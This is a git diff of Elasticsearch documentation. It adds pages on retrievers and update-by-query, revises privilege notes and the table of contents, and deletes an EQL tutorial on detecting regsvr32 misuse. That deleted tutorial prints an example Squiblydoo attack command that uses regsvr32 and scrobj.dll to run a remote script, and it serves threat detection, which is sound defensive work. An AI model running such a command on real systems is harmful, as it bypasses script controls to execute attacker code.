request. When possible, let {{es}} perform early termination automatically. Avoid specifying this parameter for requests that target data streams with backing indices across multiple data tiers. + :::: + + +`sort` +: (Optional, [sort object](/reference/elasticsearch/rest-apis/sort-search-results.md)) A sort object that specifies the order of matching documents. + + +`min_score` +: (Optional, `float`) + + Minimum [`_score`](/reference/query-languages/query-dsl/query-filter-context.md#relevance-scores) for matching documents. Documents with a lower `_score` are not included in the top documents. + + +`collapse` +: (Optional, [collapse object](/reference/elasticsearch/rest-apis/collapse-search-results.md)) + + Collapses the top documents by a specified key into a single top document per key. + + +## Restrictions [_restrictions] + +When a retriever tree contains a compound retriever (a retriever with two or more child retrievers) the [search after](/reference/elasticsearch/rest-apis/paginate-search-results.md#search-after) parameter is not supported. + + +## Example [standard-retriever-example] + +```console +GET /restaurants/_search +{ + "retriever": { <1> + "standard": { <2> + "query": { <3> + "bool": { <4> + "should": [ <5> + { + "match": { <6> + "region": "Austria" + } + } + ], + "filter": [ <7> + { + "term": { <8> + "year": "2019" <9> + } + } + ] + } + } + } + } +} +``` + +1. Opens the `retriever` object. +2. The `standard` retriever is used for defining traditional {{es}} queries. +3. The entry point for defining the search query. +4. The `bool` object allows for combining multiple query clauses logically. +5. The `should` array indicates conditions under which a document will match. Documents matching these conditions will have increased relevancy scores. +6. The `match` object finds documents where the `region` field contains the word "Austria." +7. The `filter` array provides filtering conditions that must be met but do not contribute to the relevancy score. +8. The `term` object is used for exact matches, in this case, filtering documents by the `year` field. +9. The exact value to match in the `year` field. diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/text-similarity-reranker-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/text-similarity-reranker-retriever.md new file mode 100644 index 0000000000000..9abb236a45d1e --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/text-similarity-reranker-retriever.md @@ -0,0 +1,248 @@ +--- +applies_to: + stack: all + serverless: ga +--- + +# Text similarity re-ranker retriever [text-similarity-reranker-retriever] + +The `text_similarity_reranker` retriever uses an NLP model to improve search results by reordering the top-k documents based on their semantic similarity to the query. + +::::{tip} +Refer to [*Semantic re-ranking*](docs-content://solutions/search/ranking/semantic-reranking.md) for a high level overview of semantic re-ranking. +:::: + +## Prerequisites [_prerequisites_15] + +To use `text_similarity_reranker`, you can rely on the preconfigured `.rerank-v1-elasticsearch` inference endpoint, which uses the [Elastic Rerank model](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-rerank.md) and serves as the default if no `inference_id` is provided. This model is optimized for reranking based on text similarity. If you'd like to use a different model, you can set up a custom inference endpoint for the `rerank` task using the [Create {{infer}} API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put). The endpoint should be configured with a machine learning model capable of computing text similarity. Refer to [the Elastic NLP model reference](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-model-ref.md#ml-nlp-model-ref-text-similarity) for a list of third-party text similarity models supported by {{es}}. + +You have the following options: + +* Use the built-in [Elastic Rerank](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-rerank.md) cross-encoder model via the inference API’s {{es}} service. See [this example](https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-elasticsearch.html#inference-example-elastic-reranker) for creating an endpoint using the Elastic Rerank model. +* Use the [Cohere Rerank inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the `rerank` task type. +* Use the [Google Vertex AI inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the `rerank` task type. +* Upload a model to {{es}} with [Eland](eland://reference/machine-learning.md#ml-nlp-pytorch) using the `text_similarity` NLP task type. + + * Then set up an [{{es}} service inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the `rerank` task type. + * Refer to the [example](#text-similarity-reranker-retriever-example-eland) on this page for a step-by-step guide. + + +::::{important} +Scores from the re-ranking process are normalized using the following formula before returned to the user, to avoid having negative scores. + +```text +score = max(score, 0) + min(exp(score), 1) +``` + +Using the above, any initially negative scores are projected to (0, 1) and positive scores to [1, infinity). To revert back if needed, one can use: + +```text +score = score - 1, if score >= 0 +score = ln(score), if score < 0 +``` + +:::: + +## Parameters [text-similarity-reranker-retriever-parameters] + +`retriever` +: (Required, `retriever`) + + The child retriever that generates the initial set of top documents to be re-ranked. + + +`field` +: (Required, `string`) + + The document field to be used for text similarity comparisons. This field should contain the text that will be evaluated against the `inferenceText`. + + +`inference_id` +: (Optional, `string`) + + Unique identifier of the inference endpoint created using the {{infer}} API. If you don’t specify an inference endpoint, the `inference_id` field defaults to `.rerank-v1-elasticsearch`, a preconfigured endpoint for the elasticsearch `.rerank-v1` model. + + +`inference_text` +: (Required, `string`) + + The text snippet used as the basis for similarity comparison. + + +`rank_window_size` +: (Optional, `int`) + + The number of top documents to consider in the re-ranking process. Defaults to `10`. + + +`min_score` +: (Optional, `float`) + + Sets a minimum threshold score for including documents in the re-ranked results. Documents with similarity scores below this threshold will be excluded. Note that score calculations vary depending on the model used. + + +`filter` +: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) + + Applies the specified [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to the child `retriever`. If the child retriever already specifies any filters, then this top-level filter is applied in conjuction with the filter defined in the child retriever. + + + +## Example: Elastic Rerank [text-similarity-reranker-retriever-example-elastic-rerank] + +::::{tip} +Refer to this [Python notebook](https://github.com/elastic/elasticsearch-labs/blob/main/notebooks/search/12-semantic-reranking-elastic-rerank.ipynb) for an end-to-end example using Elastic Rerank. + +:::: + + +This example demonstrates how to deploy the [Elastic Rerank](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-rerank.md) model and use it to re-rank search results using the `text_similarity_reranker` retriever. + +Follow these steps: + +1. Create an inference endpoint for the `rerank` task using the [Create {{infer}} API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put). + + ```console + PUT _inference/rerank/my-elastic-rerank + { + "service": "elasticsearch", + "service_settings": { + "model_id": ".rerank-v1", + "num_threads": 1, + "adaptive_allocations": { <1> + "enabled": true, + "min_number_of_allocations": 1, + "max_number_of_allocations": 10 + } + } + } + ``` + + 1. [Adaptive allocations](docs-content://deploy-manage/autoscaling/trained-model-autoscaling.md#enabling-autoscaling-through-apis-adaptive-allocations) will be enabled with the minimum of 1 and the maximum of 10 allocations. + +2. Define a `text_similarity_rerank` retriever: + + ```console + POST _search + { + "retriever": { + "text_similarity_reranker": { + "retriever": { + "standard": { + "query": { + "match": { + "text": "How often does the moon hide the sun?" + } + } + } + }, + "field": "text", + "inference_id": "my-elastic-rerank", + "inference_text": "How often does the moon hide the sun?", + "rank_window_size": 100, + "min_score": 0.5 + } + } + } + ``` + + + +## Example: Cohere Rerank [text-similarity-reranker-retriever-example-cohere] + +This example enables out-of-the-box semantic search by re-ranking top documents using the Cohere Rerank API. This approach eliminates the need to generate and store embeddings for all indexed documents. This requires a [Cohere Rerank inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) that is set up for the `rerank` task type. + +```console +GET /index/_search +{ + "retriever": { + "text_similarity_reranker": { + "retriever": { + "standard": { + "query": { + "match_phrase": { + "text": "landmark in Paris" + } + } + } + }, + "field": "text", + "inference_id": "my-cohere-rerank-model", + "inference_text": "Most famous landmark in Paris", + "rank_window_size": 100, + "min_score": 0.5 + } + } +} +``` + + +## Example: Semantic re-ranking with a Hugging Face model [text-similarity-reranker-retriever-example-eland] + +The following example uses the `cross-encoder/ms-marco-MiniLM-L-6-v2` model from Hugging Face to rerank search results based on semantic similarity. The model must be uploaded to {{es}} using [Eland](eland://reference/machine-learning.md#ml-nlp-pytorch). + +::::{tip} +Refer to [the Elastic NLP model reference](docs-content://explore-analyze/machine-learning/nlp/ml-nlp-model-ref.md#ml-nlp-model-ref-text-similarity) for a list of third party text similarity models supported by {{es}}. + +:::: + + +Follow these steps to load the model and create a semantic re-ranker. + +1. Install Eland using `pip` + + ```sh + python -m pip install eland[pytorch] + ``` + +2. Upload the model to {{es}} using Eland. This example assumes you have an Elastic Cloud deployment and an API key. Refer to the [Eland documentation](eland://reference/machine-learning.md#ml-nlp-pytorch-auth) for more authentication options. + + ```sh + eland_import_hub_model \ + --cloud-id $CLOUD_ID \ + --es-api-key $ES_API_KEY \ + --hub-model-id cross-encoder/ms-marco-MiniLM-L-6-v2 \ + --task-type text_similarity \ + --clear-previous \ + --start + ``` + +3. Create an inference endpoint for the `rerank` task + + ```console + PUT _inference/rerank/my-msmarco-minilm-model + { + "service": "elasticsearch", + "service_settings": { + "num_allocations": 1, + "num_threads": 1, + "model_id": "cross-encoder__ms-marco-minilm-l-6-v2" + } + } + ``` + +4. Define a `text_similarity_rerank` retriever. + + ```console + POST movies/_search + { + "retriever": { + "text_similarity_reranker": { + "retriever": { + "standard": { + "query": { + "match": { + "genre": "drama" + } + } + } + }, + "field": "plot", + "inference_id": "my-msmarco-minilm-model", + "inference_text": "films that explore psychological depths" + } + } + } + ``` + + This retriever uses a standard `match` query to search the `movie` index for films tagged with the genre "drama". It then re-ranks the results based on semantic similarity to the text in the `inference_text` parameter, using the model we uploaded to {{es}}. diff --git a/docs/reference/elasticsearch/rest-apis/searching-with-query-rules.md b/docs/reference/elasticsearch/rest-apis/searching-with-query-rules.md index 37a97495d5c97..e7bdc9d1a5439 100644 --- a/docs/reference/elasticsearch/rest-apis/searching-with-query-rules.md +++ b/docs/reference/elasticsearch/rest-apis/searching-with-query-rules.md @@ -18,13 +18,13 @@ $$$query-rules$$$ * A referring site * etc. -Query rules define a metadata key that will be used to match the metadata provided in the [rule retriever](/reference/elasticsearch/rest-apis/retrievers.md#rule-retriever) with the criteria specified in the rule. +Query rules define a metadata key that will be used to match the metadata provided in the [rule retriever](/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md) with the criteria specified in the rule. When a query rule matches the rule metadata according to its defined criteria, the query rule action is applied to the underlying `organic` query. For example, a query rule could be defined to match a user-entered query string of `pugs` and a country `us` and promote adoptable shelter dogs if the rule query met both criteria. -Rules are defined using the [query rules API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-query_rules) and searched using the [rule retriever](/reference/elasticsearch/rest-apis/retrievers.md#rule-retriever) or the [rule query](/reference/query-languages/query-dsl/query-dsl-rule-query.md). +Rules are defined using the [query rules API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-query_rules) and searched using the [rule retriever](/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md) or the [rule query](/reference/query-languages/query-dsl/query-dsl-rule-query.md). ## Rule definition [query-rule-definition] @@ -148,7 +148,7 @@ You can use the [Get query ruleset](https://www.elastic.co/docs/api/doc/elastics ## Search using query rules [rule-query-search] -Once you have defined one or more query rulesets, you can search using these rulesets using the [rule retriever](/reference/elasticsearch/rest-apis/retrievers.md#rule-retriever) or the [rule query](/reference/query-languages/query-dsl/query-dsl-rule-query.md). Retrievers are the recommended way to use rule queries, as they will work out of the box with other reranking retrievers such as [Reciprocal rank fusion](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md). +Once you have defined one or more query rulesets, you can search using these rulesets using the [rule retriever](/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md) or the [rule query](/reference/query-languages/query-dsl/query-dsl-rule-query.md). Retrievers are the recommended way to use rule queries, as they will work out of the box with other reranking retrievers such as [Reciprocal rank fusion](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md). Rulesets are evaluated in order, so rules in the first ruleset you specify will be applied before any subsequent rulesets. @@ -186,7 +186,7 @@ It’s possible to have multiple rules in a ruleset match a single [rule query]( * If multiple documents are specified in a single rule, in the order they are specified * If a document is matched by both a `pinned` rule and an `exclude` rule, the `exclude` rule will take precedence -You can specify reranking retrievers such as [rrf](/reference/elasticsearch/rest-apis/retrievers.md#rrf-retriever) or [text_similarity_reranker](/reference/elasticsearch/rest-apis/retrievers.md#text-similarity-reranker-retriever) in the rule query to apply query rules on already-reranked results. Here is an example: +You can specify reranking retrievers such as [rrf](/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md) or [text_similarity_reranker](/reference/elasticsearch/rest-apis/retrievers/text-similarity-reranker-retriever.md) in the rule query to apply query rules on already-reranked results. Here is an example: ```console GET my-index-000001/_search diff --git a/docs/reference/elasticsearch/rest-apis/update-by-query-api.md b/docs/reference/elasticsearch/rest-apis/update-by-query-api.md new file mode 100644 index 0000000000000..00bc1bc8b0221 --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/update-by-query-api.md @@ -0,0 +1,425 @@ +--- +navigation_title: "Update By Query API" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/8.18/docs-update.html#update-api-example +applies_to: + stack: all +--- + +# Update by query API examples + +This page provides examples of how to use the [Update by query API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update-by-query). + +You can learn how to: + +- [Run basic update-by-query operations](#run-basic-updates) +- [Modify documents using scripts or ingest pipelines](#update-the-document) +- [Throttle update operations](#change-throttling-for-a-request) +- [Parallelize updates using manual slicing](#slice-manually) +- [Automate slicing for better performance](#use-automatic-slicing) +- [Apply mapping changes to existing documents](#pick-up-a-new-property) + +## Run basic updates + +The simplest usage of `_update_by_query` just performs an update on every document in the data stream or index without changing the source. This is useful to [pick up a new property](#pick-up-a-new-property) or some other online mapping change. + +To update selected documents, specify a query in the request body: + +```console +POST my-index-000001/_update_by_query?conflicts=proceed +{ + "query": { <1> + "term": { + "user.id": "kimchy" + } + } +} +``` +% TEST[setup:my_index] + +1. The query must be passed as a value to the `query` key, in the same way as the [Search API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search). You can also use the `q` parameter in the same way as the search API. + +### Target multiple indices + +Update documents in multiple data streams or indices: + +```console +POST my-index-000001,my-index-000002/_update_by_query +``` +% TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] + +### Filter by routing + +Limit the update by query operation to shards that a particular routing value: + +```console +POST my-index-000001/_update_by_query?routing=1 +``` +% TEST[setup:my_index] + +### Change batch size + +By default update by query uses scroll batches of 1000. You can change the batch size with the `scroll_size` parameter: + +```console +POST my-index-000001/_update_by_query?scroll_size=100 +``` +% TEST[setup:my_index] + +## Update the document + +Update a document using a unique attribute: + +```console +POST my-index-000001/_update_by_query +{ + "query": { + "term": { + "user.id": "kimchy" + } + }, + "max_docs": 1 +} +``` +% TEST[setup:my_index] + +### Update the document source + +Update by query supports scripts to update the document source. For example, the following request increments the `count` field for all documents with a `user.id` of `kimchy` in `my-index-000001`: + + + +```console +POST my-index-000001/_update_by_query +{ + "script": { + "source": "ctx._source.count++", + "lang": "painless" + }, + "query": { + "term": { + "user.id": "kimchy" + } + } +} +``` +% TEST[continued] + +Note that `conflicts=proceed` is not specified in this example. In this case, a version conflict should halt the process so you can handle the failure. + +As with the [Update API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update), you can set `ctx.op` to change the operation that is performed: + +`noop` +: Set `ctx.op = "noop"` if your script decides that it doesn't have to make any changes. +The update by query operation skips updating the document and increments the `noop` counter. + +`delete` +: Set `ctx.op = "delete"` if your script decides that the document should be deleted. +The update by query operation deletes the document and increments the `deleted` counter. + +Update by query only supports `index`, `noop`, and `delete`. Setting `ctx.op` to anything else is an error. Setting any other field in `ctx` is an error. +This API only enables you to modify the source of matching documents, you cannot move them. + +### Update documents using an ingest pipeline + +Update by query can use the [ingest pipelines](docs-content://manage-data/ingest/transform-enrich/ingest-pipelines.md) feature by specifying a `pipeline`: + +```console +PUT _ingest/pipeline/set-foo +{ + "description" : "sets foo", + "processors" : [ { + "set" : { + "field": "foo", + "value": "bar" + } + } ] +} +POST my-index-000001/_update_by_query?pipeline=set-foo +``` +% TEST[setup:my_index] + +### Get the status of update by query operations + +You can fetch the status of all running update by query requests with the [Task API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks): + +```console +GET _tasks?detailed=true&actions=*byquery +``` +% TEST[skip:No tasks to retrieve] + +The responses looks like: + +```console-result +{ + "nodes" : { + "r1A2WoRbTwKZ516z6NEs5A" : { + "name" : "r1A2WoR", + "transport_address" : "127.0.0.1:9300", + "host" : "127.0.0.1", + "ip" : "127.0.0.1:9300", + "attributes" : { + "testattr" : "test", + "portsfile" : "true" + }, + "tasks" : { + "r1A2WoRbTwKZ516z6NEs5A:36619" : { + "node" : "r1A2WoRbTwKZ516z6NEs5A", + "id" : 36619, + "type" : "transport", + "action" : "indices:data/write/update/byquery", + "status" : { <1> + "total" : 6154, + "updated" : 3500, + "created" : 0, + "deleted" : 0, + "batches" : 4, + "version_conflicts" : 0, + "noops" : 0, + "retries": { + "bulk": 0, + "search": 0 + }, + "throttled_millis": 0 + }, + "description" : "" + } + } + } + } +} +``` + +1. This object contains the actual status. It is just like the response JSON with the important addition of the `total` field. `total` is the total number of operations that the reindex expects to perform. You can estimate the progress by adding the `updated`, `created`, and `deleted` fields. The request will finish when their sum is equal to the `total` field. + +With the task id you can look up the task directly. The following example retrieves information about task `r1A2WoRbTwKZ516z6NEs5A:36619`: + +```console +GET /_tasks/r1A2WoRbTwKZ516z6NEs5A:36619 +``` +% TEST[catch:missing] + +The advantage of this API is that it integrates with `wait_for_completion=false` to transparently return the status of completed tasks. If the task is completed and `wait_for_completion=false` was set on it, then it'll come back with a `results` or an `error` field. The cost of this feature is the document that `wait_for_completion=false` creates at `.tasks/task/${taskId}`. It is up to you to delete that document. + +### Cancel an update by query operation + +Any update by query can be cancelled using the [Cancel API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks): + +```console +POST _tasks/r1A2WoRbTwKZ516z6NEs5A:36619/_cancel +``` + +The task ID can be found using the [Task API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks). + +Cancellation should happen quickly but might take a few seconds. The task status API above will continue to list the update by query task until this task checks that it has been cancelled and terminates itself. + +## Change throttling for a request + +The value of `requests_per_second` can be changed on a running update by query using the `_rethrottle` API: + +```console +POST _update_by_query/r1A2WoRbTwKZ516z6NEs5A:36619/_rethrottle?requests_per_second=-1 +``` + +The task ID can be found using the [Task API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks). + +Just like when setting it on the `_update_by_query` API, `requests_per_second` can be either `-1` to disable throttling or any decimal number like `1.7` or `12` to throttle to that level. Rethrottling that speeds up the query takes effect immediately, but rethrotting that slows down the query will take effect after completing the current batch. This prevents scroll timeouts. + +## Slice manually + +Slice an update by query manually by providing a slice id and total number of slices to each request: + +```console +POST my-index-000001/_update_by_query +{ + "slice": { + "id": 0, + "max": 2 + }, + "script": { + "source": "ctx._source['extra'] = 'test'" + } +} +POST my-index-000001/_update_by_query +{ + "slice": { + "id": 1, + "max": 2 + }, + "script": { + "source": "ctx._source['extra'] = 'test'" + } +} +``` +% TEST[setup:my_index_big] + +Which you can verify works with: + +```console +GET _refresh +POST my-index-000001/_search?size=0&q=extra:test&filter_path=hits.total +``` +% TEST[continued] + +Which results in a sensible `total` like this one: + +```console-result +{ + "hits": { + "total": { + "value": 120, + "relation": "eq" + } + } +} +``` + +## Use automatic slicing + +You can also let update by query automatically parallelize using [slice-scroll](paginate-search-results.md#slice-scroll) to slice on `_id`. Use `slices` to specify the number of slices to use: + +```console +POST my-index-000001/_update_by_query?refresh&slices=5 +{ + "script": { + "source": "ctx._source['extra'] = 'test'" + } +} +``` +% TEST[setup:my_index_big] + +Which you also can verify works with: + +```console +POST my-index-000001/_search?size=0&q=extra:test&filter_path=hits.total +``` +% TEST[continued] + +Which results in a sensible `total` like this one: + +```console-result +{ + "hits": { + "total": { + "value": 120, + "relation": "eq" + } + } +} +``` + +Setting `slices` to `auto` will let Elasticsearch choose the number of slices to use. This setting will use one slice per shard, up to a certain limit. If there are multiple source data streams or indices, it will choose the number of slices based on the index or backing index with the smallest number of shards. + +Adding `slices` to `_update_by_query` just automates the manual process used in the section above, creating sub-requests which means it has some quirks: + +- You can see these requests in the [Tasks APIs](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update-by-query). These sub-requests are "child" tasks of the task for the request with `slices`. +- Fetching the status of the task for the request with `slices` only contains the status of completed slices. +- These sub-requests are individually addressable for things like cancellation and rethrottling. +- Rethrottling the request with `slices` will rethrottle the unfinished sub-request proportionally. +- Canceling the request with `slices` will cancel each sub-request. +- Due to the nature of `slices` each sub-request won't get a perfectly even portion of the documents. All documents will be addressed, but some slices may be larger than others. Expect larger slices to have a more even distribution. +- Parameters like `requests_per_second` and `max_docs` on a request with `slices` are distributed proportionally to each sub-request. Combine that with the point above about distribution being uneven and you should conclude that using `max_docs` with `slices` might not result in exactly `max_docs` documents being updated. +- Each sub-request gets a slightly different snapshot of the source data stream or index though these are all taken at approximately the same time. + +## Pick up a new property + +Say you created an index without dynamic mapping, filled it with data, and then added a mapping value to pick up more fields from the data: + +```console +PUT test +{ + "mappings": { + "dynamic": false, <1> + "properties": { + "text": {"type": "text"} + } + } +} + +POST test/_doc?refresh +{ + "text": "words words", + "flag": "bar" +} +POST test/_doc?refresh +{ + "text": "words words", + "flag": "foo" +} +PUT test/_mapping <2> +{ + "properties": { + "text": {"type": "text"}, + "flag": {"type": "text", "analyzer": "keyword"} + } +} +``` + +1. This means that new fields won't be indexed, just stored in `_source`. + +2. This updates the mapping to add the new `flag` field. To pick up the new field you have to reindex all documents with it. + +Searching for the data won't find anything: + +```console +POST test/_search?filter_path=hits.total +{ + "query": { + "match": { + "flag": "foo" + } + } +} +``` +% TEST[continued] + +```console-result +{ + "hits" : { + "total": { + "value": 0, + "relation": "eq" + } + } +} +``` + +But you can issue an `_update_by_query` request to pick up the new mapping: + +```console +POST test/_update_by_query?refresh&conflicts=proceed +POST test/_search?filter_path=hits.total +{ + "query": { + "match": { + "flag": "foo" + } + } +} +``` +% TEST[continued] + +```console-result +{ + "hits" : { + "total": { + "value": 1, + "relation": "eq" + } + } +} +``` + +You can do the exact same thing when adding a field to a multifield. + + diff --git a/docs/reference/elasticsearch/security-privileges.md b/docs/reference/elasticsearch/security-privileges.md index 6e0fd02b2c3b8..ae3438cec16c6 100644 --- a/docs/reference/elasticsearch/security-privileges.md +++ b/docs/reference/elasticsearch/security-privileges.md @@ -286,22 +286,20 @@ This section lists the privileges that you can assign to a role. `create` : Privilege to index documents. - :::{admonition} Deprecated in 8.0 - Also grants the permission to update the index mapping (but not the data streams mapping), using the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or by relying on [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). In a future major release, this privilege will not grant any mapping update permissions. - ::: - ::::{note} This privilege does not restrict the index operation to the creation of documents but instead restricts API use to the index API. The index API allows a user to overwrite a previously indexed document. See the `create_doc` privilege for an alternative. :::: + :::{important} + Starting from 8.0, this privilege no longer grants the permission to update index mappings. + In earlier versions, it implicitly permitted index mapping updates (excluding data stream mappings) via the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or through [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). + Mapping update capabilities will be fully removed in a future major release. + ::: + `create_doc` : Privilege to index documents. It does not grant the permission to update or overwrite existing documents. - :::{admonition} Deprecated in 8.0 - Also grants the permission to update the index mapping (but not the data streams mapping), using the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or by relying on [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). In a future major release, this privilege will not grant any mapping update permissions. - ::: - ::::{note} This privilege relies on the `op_type` of indexing requests ([Index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-create) and [Bulk](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-bulk)). When ingesting documents as a user who has the `create_doc` privilege (and no higher privilege such as `index` or `write`), you must ensure that *op_type* is set to *create* through one of the following: @@ -311,6 +309,12 @@ This section lists the privileges that you can assign to a role. :::: + :::{important} + Starting from 8.0, this privilege no longer grants the permission to update index mappings. + In earlier versions, it implicitly permitted index mapping updates (excluding data stream mappings) via the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or through [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). + Mapping update capabilities will be fully removed in a future major release. + ::: + `create_index` : Privilege to create an index or data stream. A create index request may contain aliases to be added to the index once created. In that case the request requires the `manage` privilege as well, on both the index and the aliases names. @@ -340,8 +344,10 @@ This section lists the privileges that you can assign to a role. `index` : Privilege to index and update documents. - :::{admonition} Deprecated in 8.0 - Also grants the permission to update the index mapping (but not the data streams mapping), using the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or by relying on [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). In a future major release, this privilege will not grant any mapping update permissions. + :::{important} + Starting from 8.0, this privilege no longer grants the permission to update index mappings. + In earlier versions, it implicitly permitted index mapping updates (excluding data stream mappings) via the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or through [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). + Mapping update capabilities will be fully removed in a future major release. ::: `maintenance` @@ -389,8 +395,10 @@ This section lists the privileges that you can assign to a role. `write` : Privilege to perform all write operations to documents, which includes the permission to index, update, and delete documents as well as performing bulk operations, while also allowing to dynamically update the index mapping. - :::{admonition} Deprecated in 8.0 - It also grants the permission to update the index mapping (but not the data streams mapping), using the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping). This will be retracted in a future major release. + :::{important} + Starting from 8.0, this privilege no longer grants the permission to update index mappings. + In earlier versions, it implicitly permitted index mapping updates (excluding data stream mappings) via the [updating mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) or through [dynamic field mapping](docs-content://manage-data/data-store/mapping/dynamic-mapping.md). + Mapping update capabilities will be fully removed in a future major release. ::: ## Run as privilege [_run_as_privilege] diff --git a/docs/reference/elasticsearch/toc.yml b/docs/reference/elasticsearch/toc.yml index 16bffed9e0699..01774d0a6bc93 100644 --- a/docs/reference/elasticsearch/toc.yml +++ b/docs/reference/elasticsearch/toc.yml @@ -96,6 +96,16 @@ toc: - file: rest-apis/retrieve-selected-fields.md - file: rest-apis/retrieve-stored-fields.md - file: rest-apis/retrievers.md + children: + - file: rest-apis/retrievers/knn-retriever.md + - file: rest-apis/retrievers/linear-retriever.md + - file: rest-apis/retrievers/pinned-retriever.md + - file: rest-apis/retrievers/rescorer-retriever.md + - file: rest-apis/retrievers/rrf-retriever.md + - file: rest-apis/retrievers/rule-retriever.md + - file: rest-apis/retrievers/standard-retriever.md + - file: rest-apis/retrievers/text-similarity-reranker-retriever.md + - file: rest-apis/retrievers/retrievers-examples.md - file: rest-apis/search-multiple-data-streams-indices.md - file: rest-apis/search-profile.md - file: rest-apis/search-rank-eval.md @@ -105,6 +115,7 @@ toc: - file: rest-apis/searching-with-query-rules.md - file: rest-apis/shard-request-cache.md - file: rest-apis/term-vectors-examples.md + - file: rest-apis/update-by-query-api.md - file: rest-apis/update-cc-api-key-examples.md - file: rest-apis/vector-tile-search.md - file: mapping-reference/index.md diff --git a/docs/reference/query-languages/eql/eql-ex-threat-detection.md b/docs/reference/query-languages/eql/eql-ex-threat-detection.md deleted file mode 100644 index 92df0aef64667..0000000000000 --- a/docs/reference/query-languages/eql/eql-ex-threat-detection.md +++ /dev/null @@ -1,332 +0,0 @@ ---- -mapped_pages: - - https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-ex-threat-detection.html ---- - -# Example: Detect threats with EQL [eql-ex-threat-detection] - -This example tutorial shows how you can use EQL to detect security threats and other suspicious behavior. In the scenario, you’re tasked with detecting [regsvr32 misuse](https://attack.mitre.org/techniques/T1218/010/) in Windows event logs. - -`regsvr32.exe` is a built-in command-line utility used to register `.dll` libraries in Windows. As a native tool, `regsvr32.exe` has a trusted status, letting it bypass most allowlist software and script blockers. Attackers with access to a user’s command line can use `regsvr32.exe` to run malicious scripts via `.dll` libraries, even on machines that otherwise disallow such scripts. - -One common variant of regsvr32 misuse is a [Squiblydoo attack](https://attack.mitre.org/techniques/T1218/010/). In a Squiblydoo attack, a `regsvr32.exe` command uses the `scrobj.dll` library to register and run a remote script. These commands often look like this: - -```sh -"regsvr32.exe /s /u /i: scrobj.dll" -``` - - -## Setup [eql-ex-threat-detection-setup] - -This tutorial uses a test dataset from [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) that includes events imitating a Squiblydoo attack. The data has been mapped to [Elastic Common Schema (ECS)][Elastic Common Schema (ECS)](ecs://reference/index.md)) fields. - -To get started: - -1. Create an [index template](docs-content://manage-data/data-store/templates.md) with [data stream enabled](docs-content://manage-data/data-store/data-streams/set-up-data-stream.md#create-index-template): - - ```console - PUT /_index_template/my-data-stream-template - { - "index_patterns": [ "my-data-stream*" ], - "data_stream": { }, - "priority": 500 - } - ``` - -2. Download [`normalized-T1117-AtomicRed-regsvr32.json`](https://raw.githubusercontent.com/elastic/elasticsearch/master/docs/src/yamlRestTest/resources/normalized-T1117-AtomicRed-regsvr32.json). -3. Use the [bulk API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-bulk) to index the data to a matching stream: - - ```sh - curl -H "Content-Type: application/json" -XPOST "localhost:9200/my-data-stream/_bulk?pretty&refresh" --data-binary "@normalized-T1117-AtomicRed-regsvr32.json" - ``` - -4. Use the [cat indices API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-indices) to verify the data was indexed: - - ```console - GET /_cat/indices/my-data-stream?v=true&h=health,status,index,docs.count - ``` - - The response should show a `docs.count` of `150`. - - 